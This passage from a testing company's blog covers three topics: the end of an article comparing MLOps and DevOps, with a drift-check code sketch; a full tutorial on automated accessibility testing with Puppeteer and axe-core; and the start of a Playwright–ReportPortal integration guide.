| 6 | Tools and Technologies | Git, GitHub, GitLab; Jenkins, CircleCI, GitHub Actions; Docker, Kubernetes; Prometheus, Grafana, ELK; Terraform, Ansible | DVC, Delta Lake; MLflow, Weights & Biases; TensorFlow, PyTorch, Scikit-learn; Seldon, TFX, KServe; Evidently AI, Arize AI | DevOps: Jenkins + Terraform. MLOps: MLflow + TFX. |
| 7 | Team Composition | Developers, QA engineers, operations specialists | Data scientists, ML engineers, data engineers, and ops teams; collaboration is more complex. | DevOps: Team handles code reviews. MLOps: Aligns model builders, data pipeline owners, and deployment teams. |

Aligning MLOps and DevOps

While MLOps and DevOps have distinct focuses, they are not mutually exclusive. Organisations can align them to create a unified pipeline that supports both software and ML development. Below are strategies to achieve this alignment.

1. Unified CI/CD Pipelines

Integrate ML workflows into existing CI/CD systems. For example, use Jenkins or GitLab to trigger data preprocessing, model training, and deployment alongside software builds.

Example: A retail company uses GitLab to manage both its e-commerce platform (DevOps) and recommendation engine (MLOps). Commits to the codebase trigger software builds, while updates to the model repository trigger training pipelines.

2. Shared Infrastructure

Leverage containerization (Docker, Kubernetes) and cloud platforms (AWS, Azure, GCP) for both software and ML workloads. This reduces overhead and ensures consistency.

Example: A healthcare company deploys a patient management system (DevOps) and a diagnostic model (MLOps) on the same Kubernetes cluster, using shared monitoring tools like Prometheus.

3. Cross-Functional Teams

Foster collaboration between MLOps and DevOps teams through cross-training and shared goals. Data scientists can learn CI/CD basics, while DevOps engineers can learn how ML models are deployed.

Example: A fintech firm organises workshops where DevOps engineers learn about model drift, and data scientists learn about Kubernetes. This reduces friction during deployments.

4. Standardised Monitoring

Use a unified monitoring framework to track both application and model performance. Tools like Grafana can visualise metrics from software (e.g., latency) and models (e.g., accuracy).

Example: A logistics company uses Grafana to monitor its delivery tracking app (DevOps) and demand forecasting model (MLOps), with dashboards showing both system uptime and prediction errors.

5. Governance and Compliance

Align on governance practices, especially for regulated industries. Both DevOps and MLOps must ensure security, data privacy, and auditability.

Example: A bank implements role-based access control (RBAC) for its trading platform (DevOps) and credit risk model (MLOps), ensuring compliance with GDPR and financial regulations.

Real-World Case Studies

Case Study 1: Netflix (MLOps and DevOps Integration)

Netflix uses DevOps to manage its streaming platform and MLOps for its recommendation engine. The DevOps team leverages Spinnaker for CI/CD and AWS for infrastructure. The MLOps team uses custom pipelines to train personalisation models, with data stored in S3 and models deployed via SageMaker. Both teams share Kubernetes for deployment and Prometheus for monitoring, ensuring seamless delivery of features and recommendations.

Key Takeaway: Shared infrastructure and monitoring enable Netflix to scale both software and ML workloads efficiently.

Case Study 2: Uber (MLOps for Autonomous Driving)

Uber’s autonomous driving division relies heavily on MLOps to develop and deploy perception models. Data from sensors is versioned using DVC, and models are trained with TensorFlow. The MLOps pipeline integrates with Uber’s DevOps infrastructure, using Docker and Kubernetes for deployment. Continuous monitoring detects model drift due to new road conditions, triggering retraining.

Key Takeaway: MLOps extends DevOps to handle the iterative nature of ML, with a focus on data and model management.

Challenges and Solutions

DevOps Challenges

Siloed Teams: Miscommunication between developers and operations.

- Solution: Adopt a DevOps culture with shared tools and goals.

Legacy Systems: Older infrastructure may not support automation.

- Solution: Gradually migrate to cloud-native solutions like Kubernetes.

MLOps Challenges

Data Drift: Models degrade when input data changes.

- Solution: Implement monitoring tools like Evidently AI to detect drift and trigger retraining.

Reproducibility: Experiments are hard to replicate without proper versioning.

- Solution: Use tools like MLflow and DVC for experimentation and data versioning.
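Drift tools such as Evidently AI compute drift statistics for you. To show what such a check does under the hood, here is a minimal Population Stability Index (PSI) sketch. PSI sums (aᵢ − eᵢ) · ln(aᵢ / eᵢ) over shared bins, where eᵢ and aᵢ are the reference and live shares in bin i. The 10 equal-width bins and the 0.2 alert threshold are common rules of thumb, not settings of any particular tool.

```javascript
// Share of `values` falling into each of `bins` equal-width buckets on [min, max].
function binShares(values, min, max, bins) {
  const counts = new Array(bins).fill(0);
  const width = (max - min) / bins || 1; // guard against a constant feature
  for (const v of values) {
    const i = Math.min(bins - 1, Math.max(0, Math.floor((v - min) / width)));
    counts[i] += 1;
  }
  return counts.map((c) => c / values.length);
}

// Population Stability Index of live data against a reference (training) sample.
function psi(reference, live, bins = 10) {
  const min = reference.reduce((m, v) => Math.min(m, v), Infinity);
  const max = reference.reduce((m, v) => Math.max(m, v), -Infinity);
  const expected = binShares(reference, min, max, bins);
  const actual = binShares(live, min, max, bins);
  const eps = 1e-6; // keeps empty bins from producing log(0)
  let total = 0;
  for (let i = 0; i < bins; i++) {
    const e = Math.max(expected[i], eps);
    const a = Math.max(actual[i], eps);
    total += (a - e) * Math.log(a / e);
  }
  return total;
}

// Rule-of-thumb trigger: PSI above 0.2 is often read as significant drift.
function driftDetected(reference, live, threshold = 0.2) {
  return psi(reference, live) > threshold;
}
```

A monitoring job could run `driftDetected` per feature on each batch of live inputs and start the retraining pipeline when it returns true.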

Future Trends

- AIOps: Integrating AI into DevOps for predictive analytics and automated incident resolution.

- AutoML in MLOps: Automating model selection and hyperparameter tuning to streamline MLOps pipelines.

- Serverless ML: Deploying models using serverless architectures (e.g., AWS Lambda) for cost efficiency.

- Federated Learning: Training models across distributed devices, requiring new MLOps workflows.

Conclusion

MLOps and DevOps are complementary frameworks that address the distinct needs of software and machine learning development. DevOps focuses on delivering reliable software through CI/CD, while MLOps tackles the complexities of data-driven ML models with iterative training and monitoring. By aligning their tools, processes, and teams, organisations can build robust pipelines that support both traditional applications and AI-driven solutions. Whether you’re deploying a web app or a recommendation system, understanding the interplay between DevOps and MLOps is key to staying competitive in today’s tech-driven world.

Start by assessing your organisation’s needs: Are you building software, ML models, or both? Then, adopt the right tools and practices to create a seamless workflow. With MLOps and DevOps working in harmony, the possibilities for innovation are endless.

Frequently Asked Questions

Can DevOps and MLOps be used together?

Yes, integrating MLOps into existing DevOps pipelines helps organizations build unified systems that support both software and ML workflows, improving collaboration, efficiency, and scalability.

Why is MLOps necessary for machine learning projects?

MLOps addresses ML-specific challenges like data drift, reproducibility, and model degradation, ensuring that models remain accurate, reliable, and maintainable over time.

What tools are commonly used in MLOps and DevOps?

DevOps tools include Jenkins, Docker, Kubernetes, and Prometheus. MLOps tools include MLflow, DVC, TFX, TensorFlow, and monitoring tools like Evidently AI and Arize AI.

What industries benefit most from MLOps and DevOps integration?

Industries like healthcare, finance, e-commerce, and autonomous vehicles greatly benefit from integrating DevOps and MLOps due to their reliance on both scalable software systems and data-driven models.

What is the future of MLOps and DevOps?

Trends like AIOps, AutoML, serverless ML, and federated learning are shaping the future, pushing toward more automation, distributed learning, and intelligent monitoring across pipelines.

by Rajesh K | Apr 28, 2025 | Accessibility Testing, Blog, Latest Post |

As digital products become essential to daily life, accessibility is more critical than ever. Accessibility testing ensures that websites and applications are usable by everyone, including people with vision, hearing, motor, or cognitive impairments. While manual accessibility reviews are important, relying solely on them is inefficient for modern development cycles. This is where automated accessibility testing comes in, empowering teams to detect and fix accessibility issues early and consistently. In this blog, we’ll explore automated accessibility testing and how you can leverage Puppeteer, a browser automation tool, to perform smart, customized accessibility checks.

What is Automated Accessibility Testing?

Automated accessibility testing uses software tools to evaluate websites and applications against standards like WCAG 2.1/2.2, ADA Title III, and Section 508. These tools quickly identify missing alt texts, ARIA role issues, keyboard traps, and more, allowing teams to fix issues before they escalate.

Note: While automation catches many technical issues, real-world usability testing still requires human intervention.

Why Automated Accessibility Testing Matters

- Early Defect Detection: Catch issues during development.

- Compliance Assurance: Support legal compliance.

- Faster Development: Avoid late-stage fixes.

- Cost Efficiency: Reduce remediation costs.

- Wider Audience Reach: Serve all users better.

Understanding Accessibility Testing Foundations

Accessibility testing analyzes the Accessibility Tree generated by the browser, which depends on:

- Semantic HTML elements

- ARIA roles and attributes

- Keyboard focus management

- Visibility of content (CSS/JavaScript)

Key Automated Accessibility Testing Tools

- axe-core: Leading open-source rules engine.

- Pa11y: CLI tool for automated scans.

- Google Lighthouse: Built into Chrome DevTools.

- Tenon, WAVE API: Online accessibility scanners.

- Screen Reader Simulation Tools: Simulate screen reader-like navigation.

Automated vs. Manual Screen Reader Testing

| S. No | Aspect | Automated Testing | Manual Testing |
|---|---|---|---|
| 1 | Speed | Fast (runs in CI/CD) | Slower (human verification) |
| 2 | Coverage | Broad (static checks) | Deep (dynamic interactions) |
| 3 | False Positives | Possible (needs tuning) | Minimal (human judgment) |
| 4 | Best For | Early-stage checks | Real-user experience validation |

Automated Accessibility Testing with Puppeteer

Puppeteer is a Node.js library developed by the Chrome team. It provides a high-level API to control Chrome or Chromium through the DevTools Protocol, enabling you to script browser interactions with ease.

Puppeteer allows you to:

- Open web pages programmatically

- Perform actions like clicks, form submissions, scrolling

- Capture screenshots and generate PDFs

- Monitor network activity

- Emulate devices or user behaviors

- Perform accessibility audits

It supports both:

- Headless Mode (invisible browser, faster, ideal for CI/CD)

- Headful Mode (visible browser, great for debugging)

Because Puppeteer drives a real browser instance, it is well suited to dynamic, JavaScript-heavy websites, which makes it a strong fit for accessibility automation.
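The headless/headful choice is usually made per environment. A minimal sketch, assuming a `HEADFUL` environment variable (a hypothetical project convention; Puppeteer does not read it itself), that builds the object you would pass to `puppeteer.launch()`. The `headless`, `args`, and `slowMo` keys are real launch options.

```javascript
// Build puppeteer.launch() options from the environment.
// HEADFUL=1 is a hypothetical convention for local debugging runs.
function buildLaunchOptions(env = process.env) {
  const headful = env.HEADFUL === '1';
  return {
    // Headless in CI (fast, no display needed); a visible window when debugging.
    headless: !headful,
    // Maximizing only makes sense when the window is visible.
    args: headful ? ['--start-maximized'] : [],
    // slowMo delays each Puppeteer operation by N ms so you can follow along.
    slowMo: headful ? 50 : 0
  };
}

console.log(buildLaunchOptions({ HEADFUL: '1' }));
console.log(buildLaunchOptions({}));
```

Usage: `const browser = await puppeteer.launch(buildLaunchOptions());` keeps one script for both local debugging and pipeline runs.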

Why Puppeteer + axe-core for Accessibility?

- Real Browser Context: Tests fully rendered pages.

- Customizable Audits: Configure scans and exclusions.

- Integration Friendly: Easy CI/CD integration.

- Enhanced Accuracy: Evaluates the DOM after JavaScript has run, catching issues that static HTML analyzers miss.
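To make "Customizable Audits" concrete: axe-core's `axe.run(context, options)` takes a context (what to scan or skip) and an options object. The sketch below assumes you want only WCAG 2 A/AA rules plus a few excluded regions. `buildAxeArgs` is a hypothetical helper; the `runOnly` option with `type: 'tag'`, the per-rule `enabled` flag, and the `exclude` array-of-selector-arrays form follow axe-core's documented API.

```javascript
// Build the (context, options) pair passed to axe.run() inside the page.
// buildAxeArgs is a hypothetical helper; the object shapes follow axe-core.
function buildAxeArgs({
  tags = ['wcag2a', 'wcag2aa'],
  excludeSelectors = [],
  disabledRules = []
} = {}) {
  // Each exclude entry is an array; longer arrays would target
  // elements inside iframes (['iframe-selector', 'inner-selector']).
  const context = { exclude: excludeSelectors.map(selector => [selector]) };

  const options = {
    // Only run rules tagged with these standards.
    runOnly: { type: 'tag', values: tags },
    // Switch off individual rules by ID.
    rules: Object.fromEntries(disabledRules.map(id => [id, { enabled: false }]))
  };
  return { context, options };
}

const { context, options } = buildAxeArgs({
  excludeSelectors: ['.ad-banner'],
  disabledRules: ['color-contrast']
});
console.log(JSON.stringify({ context, options }));
```

Inside a Puppeteer script, both objects can be handed to the page with `page.evaluate((ctx, opts) => axe.run(ctx, opts), context, options)` after axe-core has been injected.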

Setting Up Puppeteer Accessibility Testing

Step 1: Initialize the Project

mkdir a11y-testing-puppeteer
cd a11y-testing-puppeteer
npm init -y

Step 2: Install Dependencies

npm install puppeteer axe-core
npm install --save-dev @types/puppeteer @types/node typescript

Step 3: Example package.json

{
  "name": "accessibility_puppeteer",
  "version": "1.0.0",
  "main": "index.js",
  "scripts": {
    "test": "node accessibility-checker.js"
  },
  "dependencies": {
    "axe-core": "^4.10.3",
    "puppeteer": "^24.7.2"
  },
  "devDependencies": {
    "@types/node": "^22.15.2",
    "@types/puppeteer": "^5.4.7",
    "typescript": "^5.8.3"
  }
}

Step 4: Create accessibility-checker.js

const axe = require('axe-core');
const puppeteer = require('puppeteer');

async function runAccessibilityCheckExcludeSpecificClass(url) {
  // Headful mode (headless: false) is convenient while debugging;
  // use headless: true when running in CI.
  const browser = await puppeteer.launch({
    headless: false,
    args: ['--start-maximized']
  });
  console.log('Browser Open..');

  const page = await browser.newPage();
  await page.setViewport({ width: 1920, height: 1080 });

  try {
    // CSP bypass only takes effect when set before navigating to the site;
    // otherwise the page's Content-Security-Policy may block the injected script.
    await page.setBypassCSP(true);
    await page.goto(url, { waitUntil: 'networkidle2' });

    // Fixed delay so late-loading, script-rendered content can appear.
    console.log('Waiting 13 seconds...');
    await new Promise(resolve => setTimeout(resolve, 13000));

    // Inject axe-core into the page; this defines window.axe there.
    await page.evaluate(axe.source);

    const results = await page.evaluate(() => {
      // Hidden or site-specific regions to leave out of the scan.
      const globalExclude = [
        '[class*="hide"]',
        '[class*="hidden"]',
        '.sc-4abb68ca-0.itgEAh.hide-when-no-script'
      ];

      // Exclusions belong in the context argument of axe.run();
      // axe-core ignores an "exclude" key inside per-rule options.
      const context = { exclude: globalExclude.map(selector => [selector]) };

      // Run every rule registered in this axe-core build.
      const options = {
        runOnly: {
          type: 'rules',
          values: axe.getRules().map(rule => rule.ruleId)
        }
      };

      return axe.run(context, options);
    });

    console.log('Accessibility Violations:', results.violations.length);
    results.violations.forEach(violation => {
      console.log(`Help: ${violation.help} - (${violation.id})`);
      console.log('Impact:', violation.impact);
      console.log('Help URL:', violation.helpUrl);
      console.log('Tags:', violation.tags);
      console.log('Affected Nodes:', violation.nodes.length);
      violation.nodes.forEach(node => {
        console.log('HTML Node:', node.html);
      });
    });

    return results;
  } finally {
    await browser.close();
    console.log('Browser closed.');
  }
}

// Usage
runAccessibilityCheckExcludeSpecificClass('https://www.bbc.com')
  .catch(err => console.error('Error:', err));

Expected Output

When you run the script (for example, with npm test), you’ll see console output similar to this:

Browser Open..
Waiting 13 seconds...
Accessibility Violations: 4
Help: Landmarks should have a unique role or role/label/title (i.e. accessible name) combination - (landmark-unique)
Impact: moderate
Help URL: https://dequeuniversity.com/rules/axe/4.10/landmark-unique?application=axeAPI
Tags: [ 'cat.semantics', 'best-practice' ]
Affected Nodes: 1
HTML Node: <nav data-testid="level1-navigation-container" id="main-navigation-container" class="sc-2f092172-9 brnBHYZ">
Help: Elements must have sufficient color contrast - (color-contrast)
Impact: serious
Help URL: https://dequeuniversity.com/rules/axe/4.10/color-contrast?application=axeAPI
Tags: [ 'wcag2aa', 'wcag143' ]
Affected Nodes: 2
HTML Node: <a href="/news" class="menu-link">News</a>
Help: Form elements must have labels - (label)
Impact: serious
Help URL: https://dequeuniversity.com/rules/axe/4.10/label?application=axeAPI
Tags: [ 'wcag2a', 'wcag412' ]
Affected Nodes: 1
HTML Node: <input type="text" id="search" />
...
Browser closed.

Each violation includes:

- Rule description (with ID)

- Impact level (minor, moderate, serious, critical)

- Helpful links for remediation

- Affected HTML snippets

This actionable report helps prioritize fixes and maintain accessibility standards efficiently.
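Because every violation carries an `impact` value, ranking them for triage takes only a few lines. A minimal sketch, assuming `results` has the shape axe-core returns (a `violations` array whose items have `id`, `impact`, and `nodes`); `prioritize` is a hypothetical helper name, and the sample data is made up for illustration.

```javascript
// axe-core impact levels from most to least severe.
const SEVERITY = ['critical', 'serious', 'moderate', 'minor'];

// Return one summary row per violation, most severe first; ties are broken
// by the number of affected nodes. Unknown or null impacts sort last.
function prioritize(results) {
  const rank = impact => {
    const i = SEVERITY.indexOf(impact);
    return i === -1 ? SEVERITY.length : i;
  };
  return results.violations
    .map(v => ({ id: v.id, impact: v.impact, nodes: v.nodes.length }))
    .sort((a, b) => rank(a.impact) - rank(b.impact) || b.nodes - a.nodes);
}

// Trimmed, made-up sample in the shape of an axe.run() result.
const sample = {
  violations: [
    { id: 'landmark-unique', impact: 'moderate', nodes: [{}] },
    { id: 'label', impact: 'serious', nodes: [{}] },
    { id: 'color-contrast', impact: 'serious', nodes: [{}, {}] }
  ]
};
console.table(prioritize(sample));
```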

Best Practices for Puppeteer Accessibility Automation

- Use headful mode during development, headless mode for automation.

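- Wait for the page to settle before scanning: networkidle2 (no more than two open network connections for at least 500 ms) is a good baseline, but dynamic content may need an extra wait.

- Exclude hidden elements globally to avoid noise.

- Save results in a machine-readable format such as JSON and log a summary, so CI jobs can archive reports and act on them.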
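For the last point, one option is to persist the raw `results` object as JSON so a CI job can archive it as an artifact. A sketch using only Node's built-in `fs` and `path` modules; the `reports/` directory, the file-naming scheme, and the `saveResults` name are assumptions. The `url` and `timestamp` fields are part of an axe-core result object.

```javascript
const fs = require('node:fs');
const path = require('node:path');

// Write axe results to <dir>/a11y-<label>.json and return the file path.
// Directory layout and naming are illustrative choices, not a convention.
function saveResults(results, { dir = 'reports', label = 'run' } = {}) {
  fs.mkdirSync(dir, { recursive: true });
  const file = path.join(dir, `a11y-${label}.json`);
  const payload = {
    url: results.url,
    timestamp: results.timestamp,
    violationCount: results.violations.length,
    violations: results.violations
  };
  fs.writeFileSync(file, JSON.stringify(payload, null, 2));
  return file;
}
```

Usage: `saveResults(results, { label: 'homepage' })` after the scan, then point your CI system's artifact step at the `reports/` folder.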

Conclusion

Automated accessibility testing empowers developers to build more inclusive, legally compliant, and user-friendly websites and applications. Puppeteer combined with axe-core enables fast, scalable accessibility audits during development. Adopting accessibility automation early leads to better products, happier users, and lower legal risk. Start today and make accessibility a core part of your development workflow!

Frequently Asked Questions


Why is automated accessibility testing important?

Automated accessibility testing is important because it helps ensure digital products are usable by people with disabilities, supports legal compliance, can benefit SEO, and helps teams catch accessibility issues early during development.


How accurate is automated accessibility testing compared to manual audits?

Automated accessibility testing can detect about 30% to 50% of common accessibility issues, such as missing alt attributes, ARIA misuse, and keyboard focus problems. However, manual audits are essential for verifying user experience, context, and visual design aspects that automated tools cannot evaluate accurately.


What are common mistakes when automating accessibility tests?

Common mistakes include:

- Running tests before the page is fully loaded.

- Ignoring hidden elements without proper configuration.

- Failing to test dynamically added content like modals or popups.

- Relying solely on automation without follow-up manual reviews.

Proper timing, configuration, and combined manual validation are critical for success.
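To avoid the timing mistakes without a fixed delay (such as the 13-second pause in the script above), you can poll for a readiness condition. Puppeteer already provides `page.waitForSelector()` for the common single-selector case; the sketch below is a generic, hypothetical `waitUntil` helper for conditions that are not a single selector. The timeout and interval defaults are arbitrary assumptions.

```javascript
// Poll a (sync or async) predicate until it returns true or time runs out.
// Resolves with the number of attempts; rejects on timeout.
async function waitUntil(predicate, { timeout = 15000, interval = 250 } = {}) {
  const deadline = Date.now() + timeout;
  let attempts = 0;
  while (true) {
    attempts += 1;
    if (await predicate()) return attempts;
    if (Date.now() >= deadline) {
      throw new Error(`Condition not met within ${timeout} ms`);
    }
    // Pause between checks to avoid hammering the page.
    await new Promise(resolve => setTimeout(resolve, interval));
  }
}
```

In a Puppeteer script the predicate could be, for example, `() => page.evaluate(() => document.querySelectorAll('[role="dialog"]').length > 0)`, so the scan starts only once a modal has actually been added to the DOM.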


Can I automate accessibility testing in CI/CD pipelines using Puppeteer?

Absolutely. Puppeteer-based accessibility scripts can be integrated into popular CI/CD tools like GitHub Actions, GitLab CI, Jenkins, or Azure DevOps. You can configure pipelines to run accessibility audits after deployments or build steps, and even fail builds if critical accessibility violations are detected.
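The build-failing step can be as small as a function that maps results to a process exit code, since CI systems mark a step as failed when its process exits non-zero. A sketch, assuming you block only on `serious` and `critical` impacts (a policy choice, not an axe-core default); `exitCodeFor` is a hypothetical name.

```javascript
// Impacts that should break the build; adjust to your team's policy.
const BLOCKING_IMPACTS = new Set(['critical', 'serious']);

// Log each blocking violation and return 1 if any exist, otherwise 0.
function exitCodeFor(results, blocking = BLOCKING_IMPACTS) {
  const blockers = results.violations.filter(v => blocking.has(v.impact));
  for (const v of blockers) {
    console.error(`[${v.impact}] ${v.id}: ${v.nodes.length} node(s)`);
  }
  return blockers.length > 0 ? 1 : 0;
}
```

Usage with the script above: `runAccessibilityCheckExcludeSpecificClass(url).then(results => { process.exitCode = exitCodeFor(results); });`. Setting `process.exitCode` instead of calling `process.exit()` lets pending output flush before Node exits.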


Is it possible to generate accessibility reports in HTML or JSON format using Puppeteer?

Yes, when combining Puppeteer with axe-core, you can capture the audit results as structured JSON data. This data can then be processed into readable HTML reports using reporting libraries or custom scripts, making it easy to review violations across multiple builds.
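A custom script for this can stay short. The sketch below turns an axe-core result object into a standalone HTML page with one table row per violation, escaping each node's HTML so snippets display as text instead of rendering. `toHtmlReport`, `escapeHtml`, and the markup are illustrative, not a library API.

```javascript
// Escape characters that are significant in HTML text and attributes.
function escapeHtml(text) {
  return String(text)
    .replace(/&/g, '&amp;')
    .replace(/</g, '&lt;')
    .replace(/>/g, '&gt;')
    .replace(/"/g, '&quot;');
}

// Render axe results as a minimal HTML page, one row per violation.
function toHtmlReport(results) {
  const rows = results.violations.map(v => `
    <tr>
      <td>${escapeHtml(v.impact)}</td>
      <td><a href="${escapeHtml(v.helpUrl)}">${escapeHtml(v.id)}</a></td>
      <td>${escapeHtml(v.help)}</td>
      <td>${v.nodes.map(n => `<code>${escapeHtml(n.html)}</code>`).join('<br>')}</td>
    </tr>`).join('');
  return `<!DOCTYPE html>
<html lang="en">
<head><meta charset="utf-8"><title>Accessibility report</title></head>
<body>
<h1>Accessibility report: ${escapeHtml(results.url)}</h1>
<table>
<thead><tr><th>Impact</th><th>Rule</th><th>Description</th><th>Nodes</th></tr></thead>
<tbody>${rows}</tbody>
</table>
</body>
</html>`;
}
```

Writing the string with `fs.writeFileSync('a11y-report.html', toHtmlReport(results))` gives a file that any CI system can publish alongside the JSON data.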

by Rajesh K | Apr 24, 2025 | Automation Testing, Blog, Featured, Latest Post |







Test automation frameworks like Playwright have revolutionized automation testing for browser-based applications with their speed, reliability, and cross-browser support. However, while Playwright excels at test execution, its default reporting capabilities can leave teams wanting more when it comes to actionable insights and collaboration. Enter ReportPortal, a powerful, open-source test reporting platform designed to transform raw test data into meaningful, real-time analytics. This guide dives deep into Playwright Report Portal Integration, offering a step-by-step approach to setting up smart test reporting. Whether you’re a QA engineer, developer, or DevOps professional, this integration will empower your team to monitor test results effectively, collaborate seamlessly, and make data-driven decisions. Let’s explore why Playwright Report Portal Integration is a game-changer and how you can implement it from scratch.

What is ReportPortal?

ReportPortal is an open-source, centralized reporting platform that enhances test automation by providing real-time, interactive, and collaborative test result analysis. Unlike traditional reporting tools that generate static logs or CI pipeline artifacts, ReportPortal aggregates test data from multiple runs, frameworks, and environments, presenting it in a user-friendly dashboard. It integrates with Playwright as well as other popular test frameworks such as Selenium and Cypress, and with CI/CD tools like Jenkins, GitHub Actions, and GitLab CI.

Key Features of ReportPortal:

- Real-Time Reporting: View test results as they execute, with live updates on pass/fail statuses, durations, and errors.

- Historical Trend Analysis: Track test performance over time to identify flaky tests or recurring issues.

- Collaboration Tools: Share test reports with team members, add comments, and assign issues for resolution.

- Custom Attributes and Filters: Tag tests with metadata (e.g., environment, feature, or priority) for advanced filtering and analysis.

- Integration Capabilities: Seamlessly connects with CI pipelines, issue trackers (e.g., Jira), and test automation frameworks.

- AI-Powered Insights: Leverage defect pattern analysis to categorize failures (e.g., product bugs, automation issues, or system errors).

ReportPortal is particularly valuable for distributed teams or projects with complex test suites, as it centralizes reporting and reduces the time spent deciphering raw test logs.

Why Choose ReportPortal for Playwright?

Playwright is renowned for its robust API, cross-browser compatibility, and built-in features like auto-waiting and parallel execution. However, its default reporters (e.g., list, JSON, or HTML) are limited to basic console outputs or static files, which can be cumbersome for large teams or long-running test suites. ReportPortal addresses these limitations by offering:

Benefits of Using ReportPortal with Playwright:

- Enhanced Visibility: Real-time dashboards provide a clear overview of test execution, including pass/fail ratios, execution times, and failure details.

- Collaboration and Accountability: Team members can comment on test results, assign defects, and link issues to bug trackers, fostering better communication.

- Trend Analysis: Identify patterns in test failures (e.g., flaky tests or environment-specific issues) to improve test reliability.

- Customizable Reporting: Use attributes and filters to slice and dice test data based on project needs (e.g., by browser, environment, or feature).

- CI/CD Integration: Integrate with CI pipelines to automatically publish test results, making it easier to monitor quality in continuous delivery workflows.

- Multimedia Support: Attach screenshots, videos, and logs to test results for easier debugging, especially for failed tests.

By combining Playwright’s execution power with ReportPortal’s intelligent reporting, teams can streamline their QA processes, reduce debugging time, and deliver higher-quality software.

Step-by-Step Guide: Playwright Report Portal Integration Made Easy

Let’s walk through the process of setting up Playwright with ReportPortal to create a seamless test reporting pipeline.

Prerequisites

Before starting, ensure you have:

Step 1: Install Dependencies

In your Playwright project directory, install the necessary packages:

npm install -D @playwright/test @reportportal/agent-js-playwright

- @playwright/test: The official Playwright test runner.

- @reportportal/agent-js-playwright: The ReportPortal agent for Playwright integration.

Step 2: Configure Playwright with ReportPortal

Modify your playwright.config.js file to include the ReportPortal reporter. Here’s a sample configuration:

// playwright.config.js

const config = {